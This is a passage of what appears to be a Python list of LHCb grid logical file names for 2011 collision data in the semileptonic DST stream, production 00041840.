'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044703_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025389_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005900_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035191_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036073_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043306_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054136_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063629_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011206_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065276_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038131_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019228_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035956_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006646_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007884_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026876_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003859_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013045_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039136_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061533_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052025_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015714_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032694_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004912_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045837_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042272_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055027_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050069_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053875_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059564_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022262_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067661_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063628_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031850_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013782_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018083_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013639_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061779_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045960_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028966_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058853_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002167_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049589_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027866_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012500_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054131_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007679_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050361_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004212_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031149_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069051_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005010_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002640_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039587_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041132_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023742_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060152_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060963_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006736_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039595_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046585_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029414_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066280_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020392_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038233_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025516_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033296_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000915_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036985_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044077_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042560_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027703_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040066_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010486_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014100_1.semileptonic.dst',
